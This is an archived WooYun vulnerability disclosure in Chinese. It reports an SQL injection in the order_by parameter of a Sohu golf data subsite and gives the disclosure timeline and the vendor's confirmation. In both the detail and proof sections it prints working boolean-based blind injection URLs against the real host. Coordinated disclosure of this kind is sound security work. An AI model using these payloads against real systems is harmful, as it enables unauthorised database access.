当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
搜狐某分站存在SQL注入
相关厂商:
漏洞作者:
提交时间:
2013-07-09 18:49
修复时间:
2013-08-23 18:50
公开时间:
2013-08-23 18:50
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
5
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2013-07-09: 细节已通知厂商并且等待厂商处理中
2013-07-09: 厂商已经确认,细节仅向厂商公开
2013-07-19: 细节向核心白帽子及相关领域专家公开
2013-07-29: 细节向普通白帽子公开
2013-08-08: 细节向实习白帽子公开
2013-08-23: 细节向公众公开

简要描述:

搜狐某分站存在sql注入

详细说明:

1:存在注入的url:
http://data.sports.sohu.com/golf/webroot/course_list.php?province=%E7%A6%8F%E5%BB%BA&hole_number=all&price=all&price_type=fee_n_visiter&course_name=&order_by=fee_n_visiter%20desc
2:有问题的参数order_by
3:http://data.sports.sohu.com/golf/webroot/course_list.php?province=%E7%A6%8F%E5%BB%BA&hole_number=all&price=all&price_type=fee_n_visiter&course_name=&order_by=fee_n_visiter%20desc,if((4>3)),1,(select%201%20from%20information_schema.tables))
结果如下:

sohu1.jpg


4:http://data.sports.sohu.com/golf/webroot/course_list.php?province=%E7%A6%8F%E5%BB%BA&hole_number=all&price=all&price_type=fee_n_visiter&course_name=&order_by=fee_n_visiter%20desc,if((4<3)),1,(select%201%20from%20information_schema.tables))

sohu2.jpg


漏洞证明:

3:http://data.sports.sohu.com/golf/webroot/course_list.php?province=%E7%A6%8F%E5%BB%BA&hole_number=all&price=all&price_type=fee_n_visiter&course_name=&order_by=fee_n_visiter%20desc,if((4>3)),1,(select%201%20from%20information_schema.tables))
结果如下:

sohu1.jpg


4:http://data.sports.sohu.com/golf/webroot/course_list.php?province=%E7%A6%8F%E5%BB%BA&hole_number=all&price=all&price_type=fee_n_visiter&course_name=&order_by=fee_n_visiter%20desc,if((4<3)),1,(select%201%20from%20information_schema.tables))

sohu2.jpg

修复方案:

过滤

版权声明:转载请注明来源 MayIKissYou@乌云


>

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-07-09 19:47

厂商回复:

感谢对搜狐安全的支持。

最新状态:

暂无